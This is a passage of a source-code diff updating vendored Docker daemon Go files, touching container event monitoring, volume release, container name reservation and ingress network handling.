-			"exitCode": strconv.Itoa(int(e.ExitCode)),
-		}
-		daemon.LogContainerEventWithAttributes(c, "die", attributes)
-		daemon.Cleanup(c)
-
-		if err == nil && restart {
-			go func() {
-				err := <-wait
-				if err == nil {
-					if err = daemon.containerStart(c, "", "", false); err != nil {
-						logrus.Debugf("failed to restart container: %+v", err)
+			// cancel healthcheck here, they will be automatically
+			// restarted if/when the container is started again
+			daemon.stopHealthchecks(c)
+			attributes := map[string]string{
+				"exitCode": strconv.Itoa(int(ei.ExitCode)),
+			}
+			daemon.LogContainerEventWithAttributes(c, "die", attributes)
+			daemon.Cleanup(c)
+
+			if err == nil && restart {
+				go func() {
+					err := <-wait
+					if err == nil {
+						// daemon.netController is initialized when daemon is restoring containers.
+						// But containerStart will use daemon.netController segment.
+						// So to avoid panic at startup process, here must wait util daemon restore done.
+						daemon.waitForStartupDone()
+						if err = daemon.containerStart(c, "", "", false); err != nil {
+							logrus.Debugf("failed to restart container: %+v", err)
+						}
 					}
-				}
-				if err != nil {
-					c.SetStopped(platformConstructExitStatus(e))
-					defer autoRemove()
-					if err != restartmanager.ErrRestartCanceled {
-						logrus.Errorf("restartmanger wait error: %+v", err)
+					if err != nil {
+						c.Lock()
+						c.SetStopped(&exitStatus)
+						c.Unlock()
+						defer daemon.autoRemove(c)
+						if err != restartmanager.ErrRestartCanceled {
+							logrus.Errorf("restartmanger wait error: %+v", err)
+						}
 					}
-				}
-			}()
-		}
+				}()
+			}
 
-		defer c.Unlock()
-		if err := c.ToDisk(); err != nil {
-			return err
+			daemon.setStateCounter(c)
+			return c.CheckpointTo(daemon.containersReplica)
 		}
-		return daemon.postRunProcessing(c, e)
-	case libcontainerd.StateExitProcess:
-		if execConfig := c.ExecCommands.Get(e.ProcessID); execConfig != nil {
-			ec := int(e.ExitCode)
+
+		if execConfig := c.ExecCommands.Get(ei.ProcessID); execConfig != nil {
+			ec := int(ei.ExitCode)
 			execConfig.Lock()
 			defer execConfig.Unlock()
 			execConfig.ExitCode = &ec
 			execConfig.Running = false
 			execConfig.StreamConfig.Wait()
 			if err := execConfig.CloseStreams(); err != nil {
-				logrus.Errorf("%s: %s", c.ID, err)
+				logrus.Errorf("failed to cleanup exec %s streams: %s", c.ID, err)
 			}
 
 			// remove the exec command from the container's store only and not the
 			// daemon's store so that the exec command can be inspected.
-			c.ExecCommands.Delete(execConfig.ID)
+			c.ExecCommands.Delete(execConfig.ID, execConfig.Pid)
+			attributes := map[string]string{
+				"execID":   execConfig.ID,
+				"exitCode": strconv.Itoa(ec),
+			}
+			daemon.LogContainerEventWithAttributes(c, "exec_die", attributes)
 		} else {
-			logrus.Warnf("Ignoring StateExitProcess for %v but no exec command found", e)
+			logrus.WithFields(logrus.Fields{
+				"container": c.ID,
+				"exec-id":   ei.ProcessID,
+				"exec-pid":  ei.Pid,
+			}).Warnf("Ignoring Exit Event, no such exec command found")
 		}
-	case libcontainerd.StateStart, libcontainerd.StateRestore:
-		// Container is already locked in this case
-		c.SetRunning(int(e.Pid), e.State == libcontainerd.StateStart)
-		c.HasBeenManuallyStopped = false
-		c.HasBeenStartedBefore = true
-		if err := c.ToDisk(); err != nil {
-			c.Reset(false)
-			return err
+	case libcontainerd.EventStart:
+		c.Lock()
+		defer c.Unlock()
+
+		// This is here to handle start not generated by docker
+		if !c.Running {
+			c.SetRunning(int(ei.Pid), false)
+			c.HasBeenManuallyStopped = false
+			c.HasBeenStartedBefore = true
+			daemon.setStateCounter(c)
+
+			daemon.initHealthMonitor(c)
+
+			if err := c.CheckpointTo(daemon.containersReplica); err != nil {
+				return err
+			}
+			daemon.LogContainerEvent(c, "start")
 		}
-		daemon.initHealthMonitor(c)
-		daemon.LogContainerEvent(c, "start")
-	case libcontainerd.StatePause:
-		// Container is already locked in this case
-		c.Paused = true
-		if err := c.ToDisk(); err != nil {
-			return err
+
+	case libcontainerd.EventPaused:
+		c.Lock()
+		defer c.Unlock()
+
+		if !c.Paused {
+			c.Paused = true
+			daemon.setStateCounter(c)
+			daemon.updateHealthMonitor(c)
+			if err := c.CheckpointTo(daemon.containersReplica); err != nil {
+				return err
+			}
+			daemon.LogContainerEvent(c, "pause")
 		}
-		daemon.updateHealthMonitor(c)
-		daemon.LogContainerEvent(c, "pause")
-	case libcontainerd.StateResume:
-		// Container is already locked in this case
-		c.Paused = false
-		if err := c.ToDisk(); err != nil {
-			return err
+	case libcontainerd.EventResumed:
+		c.Lock()
+		defer c.Unlock()
+
+		if c.Paused {
+			c.Paused = false
+			daemon.setStateCounter(c)
+			daemon.updateHealthMonitor(c)
+
+			if err := c.CheckpointTo(daemon.containersReplica); err != nil {
+				return err
+			}
+			daemon.LogContainerEvent(c, "unpause")
 		}
-		daemon.updateHealthMonitor(c)
-		daemon.LogContainerEvent(c, "unpause")
 	}
-
 	return nil
 }
+
+func (daemon *Daemon) autoRemove(c *container.Container) {
+	c.Lock()
+	ar := c.HostConfig.AutoRemove
+	c.Unlock()
+	if !ar {
+		return
+	}
+
+	var err error
+	if err = daemon.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err == nil {
+		return
+	}
+	if c := daemon.containers.Get(c.ID); c == nil {
+		return
+	}
+
+	if err != nil {
+		logrus.WithError(err).WithField("container", c.ID).Error("error removing container")
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/monitor_linux.go b/vendor/github.com/docker/docker/daemon/monitor_linux.go
deleted file mode 100644
index 09f5af50c6..0000000000
--- a/vendor/github.com/docker/docker/daemon/monitor_linux.go
+++ /dev/null
@@ -1,19 +0,0 @@
-package daemon
-
-import (
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/libcontainerd"
-)
-
-// platformConstructExitStatus returns a platform specific exit status structure
-func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus {
-	return &container.ExitStatus{
-		ExitCode:  int(e.ExitCode),
-		OOMKilled: e.OOMKilled,
-	}
-}
-
-// postRunProcessing perfoms any processing needed on the container after it has stopped.
-func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/monitor_solaris.go b/vendor/github.com/docker/docker/daemon/monitor_solaris.go
deleted file mode 100644
index 5ccfada76a..0000000000
--- a/vendor/github.com/docker/docker/daemon/monitor_solaris.go
+++ /dev/null
@@ -1,18 +0,0 @@
-package daemon
-
-import (
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/libcontainerd"
-)
-
-// platformConstructExitStatus returns a platform specific exit status structure
-func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus {
-	return &container.ExitStatus{
-		ExitCode: int(e.ExitCode),
-	}
-}
-
-// postRunProcessing perfoms any processing needed on the container after it has stopped.
-func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/monitor_windows.go b/vendor/github.com/docker/docker/daemon/monitor_windows.go
deleted file mode 100644
index 9648b1b415..0000000000
--- a/vendor/github.com/docker/docker/daemon/monitor_windows.go
+++ /dev/null
@@ -1,46 +0,0 @@
-package daemon
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/libcontainerd"
-)
-
-// platformConstructExitStatus returns a platform specific exit status structure
-func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus {
-	return &container.ExitStatus{
-		ExitCode: int(e.ExitCode),
-	}
-}
-
-// postRunProcessing perfoms any processing needed on the container after it has stopped.
-func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error {
-	if e.ExitCode == 0 && e.UpdatePending {
-		spec, err := daemon.createSpec(container)
-		if err != nil {
-			return err
-		}
-
-		newOpts := []libcontainerd.CreateOption{&libcontainerd.ServicingOption{
-			IsServicing: true,
-		}}
-
-		copts, err := daemon.getLibcontainerdCreateOptions(container)
-		if err != nil {
-			return err
-		}
-
-		if copts != nil {
-			newOpts = append(newOpts, copts...)
-		}
-
-		// Create a new servicing container, which will start, complete the update, and merge back the
-		// results if it succeeded, all as part of the below function call.
-		if err := daemon.containerd.Create((container.ID + "_servicing"), "", "", *spec, container.InitializeStdio, newOpts...); err != nil {
-			container.SetExitCode(-1)
-			return fmt.Errorf("Post-run update servicing failed: %s", err)
-		}
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/mounts.go b/vendor/github.com/docker/docker/daemon/mounts.go
index 1c11f86a80..383a38e7eb 100644
--- a/vendor/github.com/docker/docker/daemon/mounts.go
+++ b/vendor/github.com/docker/docker/daemon/mounts.go
@@ -1,11 +1,13 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 	"strings"
 
+	mounttypes "github.com/docker/docker/api/types/mount"
 	"github.com/docker/docker/container"
-	volumestore "github.com/docker/docker/volume/store"
+	volumesservice "github.com/docker/docker/volume/service"
 )
 
 func (daemon *Daemon) prepareMountPoints(container *container.Container) error {
@@ -19,28 +21,33 @@ func (daemon *Daemon) prepareMountPoints(container *container.Container) error {
 
 func (daemon *Daemon) removeMountPoints(container *container.Container, rm bool) error {
 	var rmErrors []string
+	ctx := context.TODO()
 	for _, m := range container.MountPoints {
-		if m.Volume == nil {
+		if m.Type != mounttypes.TypeVolume || m.Volume == nil {
 			continue
 		}
-		daemon.volumes.Dereference(m.Volume, container.ID)
-		if rm {
-			// Do not remove named mountpoints
-			// these are mountpoints specified like `docker run -v <name>:/foo`
-			if m.Spec.Source != "" {
-				continue
-			}
-			err := daemon.volumes.Remove(m.Volume)
-			// Ignore volume in use errors because having this
-			// volume being referenced by other container is
-			// not an error, but an implementation detail.
-			// This prevents docker from logging "ERROR: Volume in use"
-			// where there is another container using the volume.
-			if err != nil && !volumestore.IsInUse(err) {
-				rmErrors = append(rmErrors, err.Error())
-			}
+		daemon.volumes.Release(ctx, m.Volume.Name(), container.ID)
+		if !rm {
+			continue
+		}
+
+		// Do not remove named mountpoints
+		// these are mountpoints specified like `docker run -v <name>:/foo`
+		if m.Spec.Source != "" {
+			continue
+		}
+
+		err := daemon.volumes.Remove(ctx, m.Volume.Name())
+		// Ignore volume in use errors because having this
+		// volume being referenced by other container is
+		// not an error, but an implementation detail.
+		// This prevents docker from logging "ERROR: Volume in use"
+		// where there is another container using the volume.
+		if err != nil && !volumesservice.IsInUse(err) {
+			rmErrors = append(rmErrors, err.Error())
 		}
 	}
+
 	if len(rmErrors) > 0 {
 		return fmt.Errorf("Error removing volumes:\n%v", strings.Join(rmErrors, "\n"))
 	}
diff --git a/vendor/github.com/docker/docker/daemon/names.go b/vendor/github.com/docker/docker/daemon/names.go
index 273d551513..6c31949777 100644
--- a/vendor/github.com/docker/docker/daemon/names.go
+++ b/vendor/github.com/docker/docker/daemon/names.go
@@ -1,20 +1,21 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/names"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/namesgenerator"
-	"github.com/docker/docker/pkg/registrar"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/utils"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 var (
-	validContainerNameChars   = utils.RestrictedNameChars
-	validContainerNamePattern = utils.RestrictedNamePattern
+	validContainerNameChars   = names.RestrictedNameChars
+	validContainerNamePattern = names.RestrictedNamePattern
 )
 
 func (daemon *Daemon) registerName(container *container.Container) error {
@@ -30,12 +31,8 @@ func (daemon *Daemon) registerName(container *container.Container) error {
 			return err
 		}
 		container.Name = name
-
-		if err := container.ToDiskLocking(); err != nil {
-			logrus.Errorf("Error saving container name to disk: %v", err)
-		}
 	}
-	return daemon.nameIndex.Reserve(container.Name, container.ID)
+	return daemon.containersReplica.ReserveName(container.Name, container.ID)
 }
 
 func (daemon *Daemon) generateIDAndName(name string) (string, string, error) {
@@ -60,28 +57,28 @@ func (daemon *Daemon) generateIDAndName(name string) (string, string, error) {
 
 func (daemon *Daemon) reserveName(id, name string) (string, error) {
 	if !validContainerNamePattern.MatchString(strings.TrimPrefix(name, "/")) {
-		return "", fmt.Errorf("Invalid container name (%s), only %s are allowed", name, validContainerNameChars)
+		return "", errdefs.InvalidParameter(errors.Errorf("Invalid container name (%s), only %s are allowed", name, validContainerNameChars))
 	}
 	if name[0] != '/' {
 		name = "/" + name
 	}
 
-	if err := daemon.nameIndex.Reserve(name, id); err != nil {
-		if err == registrar.ErrNameReserved {
-			id, err := daemon.nameIndex.Get(name)
+	if err := daemon.containersReplica.ReserveName(name, id); err != nil {
+		if err == container.ErrNameReserved {
+			id, err := daemon.containersReplica.Snapshot().GetID(name)
 			if err != nil {
 				logrus.Errorf("got unexpected error while looking up reserved name: %v", err)
 				return "", err
 			}
-			return "", fmt.Errorf("Conflict. The container name %q is already in use by container %s. You have to remove (or rename) that container to be able to reuse that name.", name, id)
+			return "", nameConflictError{id: id, name: name}
 		}
-		return "", fmt.Errorf("error reserving name: %s, error: %v", name, err)
+		return "", errors.Wrapf(err, "error reserving name: %q", name)
 	}
 	return name, nil
 }
 
 func (daemon *Daemon) releaseName(name string) {
-	daemon.nameIndex.Release(name)
+	daemon.containersReplica.ReleaseName(name)
 }
 
 func (daemon *Daemon) generateNewName(id string) (string, error) {
@@ -92,8 +89,8 @@ func (daemon *Daemon) generateNewName(id string) (string, error) {
 			name = "/" + name
 		}
 
-		if err := daemon.nameIndex.Reserve(name, id); err != nil {
-			if err == registrar.ErrNameReserved {
+		if err := daemon.containersReplica.ReserveName(name, id); err != nil {
+			if err == container.ErrNameReserved {
 				continue
 			}
 			return "", err
@@ -102,7 +99,7 @@ func (daemon *Daemon) generateNewName(id string) (string, error) {
 	}
 
 	name = "/" + stringid.TruncateID(id)
-	if err := daemon.nameIndex.Reserve(name, id); err != nil {
+	if err := daemon.containersReplica.ReserveName(name, id); err != nil {
 		return "", err
 	}
 	return name, nil
diff --git a/vendor/github.com/docker/docker/utils/names.go b/vendor/github.com/docker/docker/daemon/names/names.go
similarity index 86%
rename from vendor/github.com/docker/docker/utils/names.go
rename to vendor/github.com/docker/docker/daemon/names/names.go
index 632062819c..22bba53d69 100644
--- a/vendor/github.com/docker/docker/utils/names.go
+++ b/vendor/github.com/docker/docker/daemon/names/names.go
@@ -1,4 +1,4 @@
-package utils
+package names // import "github.com/docker/docker/daemon/names"
 
 import "regexp"
 
diff --git a/vendor/github.com/docker/docker/daemon/network.go b/vendor/github.com/docker/docker/daemon/network.go
index ab8fd88da8..4263409be8 100644
--- a/vendor/github.com/docker/docker/daemon/network.go
+++ b/vendor/github.com/docker/docker/daemon/network.go
@@ -1,66 +1,97 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 	"net"
 	"runtime"
 	"sort"
+	"strconv"
 	"strings"
+	"sync"
 
-	"github.com/Sirupsen/logrus"
-	apierrors "github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/container"
 	clustertypes "github.com/docker/docker/daemon/cluster/provider"
+	internalnetwork "github.com/docker/docker/daemon/network"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/opts"
 	"github.com/docker/docker/pkg/plugingetter"
 	"github.com/docker/docker/runconfig"
+	"github.com/docker/go-connections/nat"
 	"github.com/docker/libnetwork"
+	lncluster "github.com/docker/libnetwork/cluster"
 	"github.com/docker/libnetwork/driverapi"
 	"github.com/docker/libnetwork/ipamapi"
+	"github.com/docker/libnetwork/netlabel"
+	"github.com/docker/libnetwork/options"
 	networktypes "github.com/docker/libnetwork/types"
 	"github.com/pkg/errors"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
+// PredefinedNetworkError is returned when user tries to create predefined network that already exists.
+type PredefinedNetworkError string
+
+func (pnr PredefinedNetworkError) Error() string {
+	return fmt.Sprintf("operation is not permitted on predefined %s network ", string(pnr))
+}
+
+// Forbidden denotes the type of this error
+func (pnr PredefinedNetworkError) Forbidden() {}
+
 // NetworkControllerEnabled checks if the networking stack is enabled.
 // This feature depends on OS primitives and it's disabled in systems like Windows.
 func (daemon *Daemon) NetworkControllerEnabled() bool {
 	return daemon.netController != nil
 }
 
-// FindNetwork function finds a network for a given string that can represent network name or id
-func (daemon *Daemon) FindNetwork(idName string) (libnetwork.Network, error) {
-	// Find by Name
-	n, err := daemon.GetNetworkByName(idName)
-	if err != nil && !isNoSuchNetworkError(err) {
-		return nil, err
-	}
-
-	if n != nil {
-		return n, nil
+// FindNetwork returns a network based on:
+// 1. Full ID
+// 2. Full Name
+// 3. Partial ID
+// as long as there is no ambiguity
+func (daemon *Daemon) FindNetwork(term string) (libnetwork.Network, error) {
+	listByFullName := []libnetwork.Network{}
+	listByPartialID := []libnetwork.Network{}
+	for _, nw := range daemon.getAllNetworks() {
+		if nw.ID() == term {
+			return nw, nil
+		}
+		if nw.Name() == term {
+			listByFullName = append(listByFullName, nw)
+		}
+		if strings.HasPrefix(nw.ID(), term) {
+			listByPartialID = append(listByPartialID, nw)
+		}
 	}
-
-	// Find by id
-	return daemon.GetNetworkByID(idName)
+	switch {
+	case len(listByFullName) == 1:
+		return listByFullName[0], nil
+	case len(listByFullName) > 1:
+		return nil, errdefs.InvalidParameter(errors.Errorf("network %s is ambiguous (%d matches found on name)", term, len(listByFullName)))
+	case len(listByPartialID) == 1:
+		return listByPartialID[0], nil
+	case len(listByPartialID) > 1:
+		return nil, errdefs.InvalidParameter(errors.Errorf("network %s is ambiguous (%d matches found based on ID prefix)", term, len(listByPartialID)))
+	}
+
+	// Be very careful to change the error type here, the
+	// libnetwork.ErrNoSuchNetwork error is used by the controller
+	// to retry the creation of the network as managed through the swarm manager
+	return nil, errdefs.NotFound(libnetwork.ErrNoSuchNetwork(term))
 }
 
-func isNoSuchNetworkError(err error) bool {
-	_, ok := err.(libnetwork.ErrNoSuchNetwork)
-	return ok
-}
-
-// GetNetworkByID function returns a network whose ID begins with the given prefix.
-// It fails with an error if no matching, or more than one matching, networks are found.
-func (daemon *Daemon) GetNetworkByID(partialID string) (libnetwork.Network, error) {
-	list := daemon.GetNetworksByID(partialID)
-
-	if len(list) == 0 {
-		return nil, libnetwork.ErrNoSuchNetwork(partialID)
-	}
-	if len(list) > 1 {
-		return nil, libnetwork.ErrInvalidID(partialID)
+// GetNetworkByID function returns a network whose ID matches the given ID.
+// It fails with an error if no matching network is found.
+func (daemon *Daemon) GetNetworkByID(id string) (libnetwork.Network, error) {
+	c := daemon.netController
+	if c == nil {
+		return nil, libnetwork.ErrNoSuchNetwork(id)
 	}
-	return list[0], nil
+	return c.NetworkByID(id)
 }
 
 // GetNetworkByName function returns a network for a given network name.
@@ -76,8 +107,8 @@ func (daemon *Daemon) GetNetworkByName(name string) (libnetwork.Network, error)
 	return c.NetworkByName(name)
 }
 
-// GetNetworksByID returns a list of networks whose ID partially matches zero or more networks
-func (daemon *Daemon) GetNetworksByID(partialID string) []libnetwork.Network {
+// GetNetworksByIDPrefix returns a list of networks whose ID partially matches zero or more networks
+func (daemon *Daemon) GetNetworksByIDPrefix(partialID string) []libnetwork.Network {
 	c := daemon.netController
 	if c == nil {
 		return nil
@@ -97,104 +128,124 @@ func (daemon *Daemon) GetNetworksByID(partialID string) []libnetwork.Network {
 // getAllNetworks returns a list containing all networks
 func (daemon *Daemon) getAllNetworks() []libnetwork.Network {
 	c := daemon.netController
-	list := []libnetwork.Network{}
-	l := func(nw libnetwork.Network) bool {
-		list = append(list, nw)
-		return false
+	if c == nil {
+		return nil
 	}
-	c.WalkNetworks(l)
-
-	return list
+	return c.Networks()
 }
 
-func isIngressNetwork(name string) bool {
-	return name == "ingress"
+type ingressJob struct {
+	create  *clustertypes.NetworkCreateRequest
+	ip      net.IP
+	jobDone chan struct{}
 }
 
-var ingressChan = make(chan struct{}, 1)
+var (
+	ingressWorkerOnce  sync.Once
+	ingressJobsChannel chan *ingressJob
+	ingressID          string
+)
 
-func ingressWait() func() {
-	ingressChan <- struct{}{}
-	return func() { <-ingressChan }
+func (daemon *Daemon) startIngressWorker() {
+	ingressJobsChannel = make(chan *ingressJob, 100)
+	go func() {
+		// nolint: gosimple
+		for {
+			select {
+			case r := <-ingressJobsChannel:
+				if r.create != nil {
+					daemon.setupIngress(r.create, r.ip, ingressID)
+					ingressID = r.create.ID
+				} else {
+					daemon.releaseIngress(ingressID)
+					ingressID = ""
+				}
+				close(r.jobDone)
+			}
+		}
+	}()
+}
+
+// enqueueIngressJob adds a ingress add/rm request to the worker queue.
+// It guarantees the worker is started.
+func (daemon *Daemon) enqueueIngressJob(job *ingressJob) {
+	ingressWorkerOnce.Do(daemon.startIngressWorker)
+	ingressJobsChannel <- job
 }
 
 // SetupIngress setups ingress networking.
-func (daemon *Daemon) SetupIngress(create clustertypes.NetworkCreateRequest, nodeIP string) error {
+// The function returns a channel which will signal the caller when the programming is completed.
+func (daemon *Daemon) SetupIngress(create clustertypes.NetworkCreateRequest, nodeIP string) (<-chan struct{}, error) {
 	ip, _, err := net.ParseCIDR(nodeIP)
 	if err != nil {
-		return err
+		return nil, err
 	}
+	done := make(chan struct{})
+	daemon.enqueueIngressJob(&ingressJob{&create, ip, done})
+	return done, nil
+}
 
-	go func() {
-		controller := daemon.netController
-		controller.AgentInitWait()
-
-		if n, err := daemon.GetNetworkByName(create.Name); err == nil && n != nil && n.ID() != create.ID {
-			if err := controller.SandboxDestroy("ingress-sbox"); err != nil {
-				logrus.Errorf("Failed to delete stale ingress sandbox: %v", err)
-				return
-			}
-
-			// Cleanup any stale endpoints that might be left over during previous iterations
-			epList := n.Endpoints()
-			for _, ep := range epList {
-				if err := ep.Delete(true); err != nil {
-					logrus.Errorf("Failed to delete endpoint %s (%s): %v", ep.Name(), ep.ID(), err)
-				}
-			}
-
-			if err := n.Delete(); err != nil {
-				logrus.Errorf("Failed to delete stale ingress network %s: %v", n.ID(), err)
-				return
-			}
-		}
+// ReleaseIngress releases the ingress networking.
+// The function returns a channel which will signal the caller when the programming is completed.
+func (daemon *Daemon) ReleaseIngress() (<-chan struct{}, error) {
+	done := make(chan struct{})
+	daemon.enqueueIngressJob(&ingressJob{nil, nil, done})
+	return done, nil
+}
 
-		if _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true); err != nil {
-			// If it is any other error other than already
-			// exists error log error and return.
-			if _, ok := err.(libnetwork.NetworkNameError); !ok {
-				logrus.Errorf("Failed creating ingress network: %v", err)
-				return
-			}
+func (daemon *Daemon) setupIngress(create *clustertypes.NetworkCreateRequest, ip net.IP, staleID string) {
+	controller := daemon.netController
+	controller.AgentInitWait()
 
-			// Otherwise continue down the call to create or recreate sandbox.
-		}
+	if staleID != "" && staleID != create.ID {
+		daemon.releaseIngress(staleID)
+	}
 
-		n, err := daemon.GetNetworkByID(create.ID)
-		if err != nil {
-			logrus.Errorf("Failed getting ingress network by id after creating: %v", err)
+	if _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true); err != nil {
+		// If it is any other error other than already
+		// exists error log error and return.
+		if _, ok := err.(libnetwork.NetworkNameError); !ok {
+			logrus.Errorf("Failed creating ingress network: %v", err)
 			return
 		}
+		// Otherwise continue down the call to create or recreate sandbox.
+	}
 
-		sb, err := controller.NewSandbox("ingress-sbox", libnetwork.OptionIngress())
-		if err != nil {
-			if _, ok := err.(networktypes.ForbiddenError); !ok {
-				logrus.Errorf("Failed creating ingress sandbox: %v", err)
-			}
-			return
-		}
+	_, err := daemon.GetNetworkByID(create.ID)
+	if err != nil {
+		logrus.Errorf("Failed getting ingress network by id after creating: %v", err)
+	}
+}
 
-		ep, err := n.CreateEndpoint("ingress-endpoint", libnetwork.CreateOptionIpam(ip, nil, nil, nil))
-		if err != nil {
-			logrus.Errorf("Failed creating ingress endpoint: %v", err)
-			return
-		}
+func (daemon *Daemon) releaseIngress(id string) {
+	controller := daemon.netController
 
-		if err := ep.Join(sb, nil); err != nil {
-			logrus.Errorf("Failed joining ingress sandbox to ingress endpoint: %v", err)
-		}
+	if id == "" {
+		return
+	}
 
-		if err := sb.EnableService(); err != nil {
-			logrus.WithError(err).Error("Failed enabling service for ingress sandbox")
-		}
-	}()
+	n, err := controller.NetworkByID(id)
+	if err != nil {
+		logrus.Errorf("failed to retrieve ingress network %s: %v", id, err)
+		return
+	}
 
-	return nil
+	daemon.deleteLoadBalancerSandbox(n)
+
+	if err := n.Delete(); err != nil {
+		logrus.Errorf("Failed to delete ingress network %s: %v", n.ID(), err)
+		return
+	}
 }
 
 // SetNetworkBootstrapKeys sets the bootstrap keys.
 func (daemon *Daemon) SetNetworkBootstrapKeys(keys []*networktypes.EncryptionKey) error {
-	return daemon.netController.SetKeys(keys)
+	err := daemon.netController.SetKeys(keys)
+	if err == nil {
+		// Upon successful key setting dispatch the keys available event
+		daemon.cluster.SendClusterEvent(lncluster.EventNetworkKeysAvailable)
+	}
+	return err
 }
 
 // UpdateAttachment notifies the attacher about the attachment config.
@@ -236,16 +287,8 @@ func (daemon *Daemon) CreateNetwork(create types.NetworkCreateRequest) (*types.N
 }
 
 func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string, agent bool) (*types.NetworkCreateResponse, error) {
-	// If there is a pending ingress network creation wait here
-	// since ingress network creation can happen via node download
-	// from manager or task download.
-	if isIngressNetwork(create.Name) {
-		defer ingressWait()()
-	}
-
-	if runconfig.IsPreDefinedNetwork(create.Name) && !agent {
-		err := fmt.Errorf("%s is a pre-defined network and cannot be created", create.Name)
-		return nil, apierrors.NewRequestForbiddenError(err)
+	if runconfig.IsPreDefinedNetwork(create.Name) {
+		return nil, PredefinedNetworkError(create.Name)
 	}
 
 	var warning string
@@ -256,8 +299,12 @@ func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string
 		}
 	}
 	if nw != nil {
+		// check if user defined CheckDuplicate, if set true, return err
+		// otherwise prepare a warning message
 		if create.CheckDuplicate {
-			return nil, libnetwork.NetworkNameError(create.Name)
+			if !agent || nw.Info().Dynamic() {
+				return nil, libnetwork.NetworkNameError(create.Name)
+			}
 		}
 		warning = fmt.Sprintf("Network with name %s (id : %s) already exists", nw.Name(), nw.ID())
 	}
@@ -273,6 +320,12 @@ func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string
 		libnetwork.NetworkOptionDriverOpts(create.Options),
 		libnetwork.NetworkOptionLabels(create.Labels),
 		libnetwork.NetworkOptionAttachable(create.Attachable),
+		libnetwork.NetworkOptionIngress(create.Ingress),
+		libnetwork.NetworkOptionScope(create.Scope),
+	}
+
+	if create.ConfigOnly {
+		nwOptions = append(nwOptions, libnetwork.NetworkOptionConfigOnly())
 	}
 
 	if create.IPAM != nil {
@@ -292,18 +345,31 @@ func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string
 		nwOptions = append(nwOptions, libnetwork.NetworkOptionPersist(false))
 	}
 
-	if isIngressNetwork(create.Name) {
-		nwOptions = append(nwOptions, libnetwork.NetworkOptionIngress())
+	if create.ConfigFrom != nil {
+		nwOptions = append(nwOptions, libnetwork.NetworkOptionConfigFrom(create.ConfigFrom.Network))
+	}
+
+	if agent && driver == "overlay" && (create.Ingress || runtime.GOOS == "windows") {
+		nodeIP, exists := daemon.GetAttachmentStore().GetIPForNetwork(id)
+		if !exists {
+			return nil, fmt.Errorf("Failed to find a load balancer IP to use for network: %v", id)
+		}
+
+		nwOptions = append(nwOptions, libnetwork.NetworkOptionLBEndpoint(nodeIP))
 	}
 
 	n, err := c.NewNetwork(driver, create.Name, id, nwOptions...)
 	if err != nil {
+		if _, ok := err.(libnetwork.ErrDataStoreNotInitialized); ok {
+			// nolint: golint
+			return nil, errors.New("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.")
+		}
 		return nil, err
 	}
 
-	daemon.pluginRefCount(driver, driverapi.NetworkPluginEndpointType, plugingetter.ACQUIRE)
+	daemon.pluginRefCount(driver, driverapi.NetworkPluginEndpointType, plugingetter.Acquire)
 	if create.IPAM != nil {
-		daemon.pluginRefCount(create.IPAM.Driver, ipamapi.PluginEndpointType, plugingetter.ACQUIRE)
+		daemon.pluginRefCount(create.IPAM.Driver, ipamapi.PluginEndpointType, plugingetter.Acquire)
 	}
 	daemon.LogNetworkEvent(n, "create")
 
@@ -373,9 +439,6 @@ func (daemon *Daemon) UpdateContainerServiceConfig(containerName string, service
 // network. If either cannot be found, an err is returned. If the
 // network cannot be set up, an err is returned.
 func (daemon *Daemon) ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error {
-	if runtime.GOOS == "solaris" {
-		return errors.New("docker network connect is unsupported on Solaris platform")
-	}
 	container, err := daemon.GetContainer(containerName)
 	if err != nil {
 		return err
@@ -386,9 +449,6 @@ func (daemon *Daemon) ConnectContainerToNetwork(containerName, networkName strin
 // DisconnectContainerFromNetwork disconnects the given container from
 // the given network. If either cannot be found, an err is returned.
 func (daemon *Daemon) DisconnectContainerFromNetwork(containerName string, networkName string, force bool) error {
-	if runtime.GOOS == "solaris" {
-		return errors.New("docker network disconnect is unsupported on Solaris platform")
-	}
 	container, err := daemon.GetContainer(containerName)
 	if err != nil {
 		if force {
@@ -434,33 +494,84 @@ func (daemon *Daemon) GetNetworkDriverList() []string {
 }
 
 // DeleteManagedNetwork deletes an agent network.
+// The requirement of networkID is enforced.
 func (daemon *Daemon) DeleteManagedNetwork(networkID string) error {
